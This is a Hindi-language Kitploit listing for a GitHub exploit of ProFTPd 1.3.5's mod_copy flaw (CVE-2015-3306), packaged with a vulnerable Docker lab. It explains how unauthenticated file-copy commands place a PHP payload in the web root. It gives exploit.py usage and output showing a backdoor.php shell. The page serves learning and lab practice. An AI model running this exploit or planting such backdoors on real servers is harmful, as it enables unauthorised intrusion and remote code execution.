Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-CVE-2015-3306 — ProFTPd 1.3.5 - (mod_copy) दूरस्थ कमांड निष्पादन शोषण और कमजोर कंटेनर | Kitploit
उपकरण/GitHubGitHub/t0kx/exploit-cve-2015-3306
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubt0kx/exploit-cve-2015-3306

exploit-CVE-2015-3306

ProFTPd 1.3.5 - (mod_copy) दूरस्थ कमांड निष्पादन शोषण और कमजोर कंटेनर

रिपॉजिटरी देखें
151548 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ProFTPd 1.3.5 - (mod_copy) रिमोट कमांड निष्पादन

ProFTPD यूनिक्स और यूनिक्स-जैसे ऑपरेटिंग सिस्टम के लिए एक अत्यधिक कॉन्फ़िगरेबल FTP डेमॉन है। ProFTPD एक सुरक्षित और कॉन्फ़िगरेबल FTP सर्वर की इच्छा से विकसित हुआ। यह Apache वेब सर्वर की महत्वपूर्ण प्रशंसा से प्रेरित था। अधिकांश अन्य Unix FTP सर्वरों के विपरीत, यह पुराने BSD ftpd कोड बेस से व्युत्पन्न नहीं है, बल्कि एक पूरी तरह से नया डिज़ाइन और कार्यान्वयन है।

असुरक्षित वातावरण

अपने परीक्षण के लिए असुरक्षित वातावरण सेटअप करने के लिए आपको Docker स्थापित चाहिए, और बस निम्नलिखित कमांड चलाएं:

root@kitploit:~
docker build -t vuln/cve-2015-3306 .
docker run --rm -it -p 21:21 -p 80:80 vuln/cve-2015-3306

और यह आपके होस्ट पर 21 और 80 पोर्ट पर एक असुरक्षित एप्लिकेशन चलाएगा।

असुरक्षित कोड

ProFTPD 1.3.5 में mod_copy मॉड्यूल रिमोट हमलावरों को site cpfr और site cpto कमांड के माध्यम से मनमाने फ़ाइलों को पढ़ने और लिखने की अनुमति देता है। कोई भी अप्रमाणित क्लाइंट इन कमांड का उपयोग करके फाइलों को फाइलसिस्टम के किसी भी भाग से चुने गए गंतव्य पर कॉपी कर सकता है। कॉपी कमांड ProFTPD सेवा के अधिकारों के साथ निष्पादित होते हैं, जो डिफ़ॉल्ट रूप से 'nobody' उपयोगकर्ता के विशेषाधिकारों के तहत चलता है। /proc/self/cmdline का उपयोग करके वेबसाइट डायरेक्टरी में PHP पेलोड कॉपी करके, PHP रिमोट कोड निष्पादन संभव हो जाता है।

शोषण

इस लक्ष्य का शोषण करने के लिए बस चलाएं:

root@kitploit:~
./exploit.py --host HOST --port PORT --path PATH

यदि आप इस असुरक्षित इमेज का उपयोग कर रहे हैं, तो आप बस चल सकते हैं:

root@kitploit:~
./exploit.py --host 127.0.0.1 --port 21 --path "/var/www/html/"

शोषण के बाद, वेब डायरेक्टरी के रूट फ़ोल्डर में backdoor.php नामक एक फ़ाइल संग्रहीत होगी। और शोषण आपको एक शेल देगा जहाँ आप बैकडोर को कमांड भेज सकते हैं:

root@kitploit:~
./exploit.py --host 127.0.0.1 --port 21 --path "/var/www/html/"
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 127.0.0.1:21
[+] Target exploited, acessing shell at http://127.0.0.1/backdoor.php
[+] Running whoami: www-data
[+] Done

क्रेडिट्स

यह कमजोरी Vadim Melihow द्वारा पाई गई थी।

अस्वीकरण

यह या पिछला प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (t0kx) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूँ। लेखक या कोई भी इंटरनेट प्रदाता इन प्रोग्रामों या उनके किसी भी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इन प्रोग्रामों का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम समझौता, आदि) t0kx की जिम्मेदारी नहीं है।

टूल डाउनलोड करें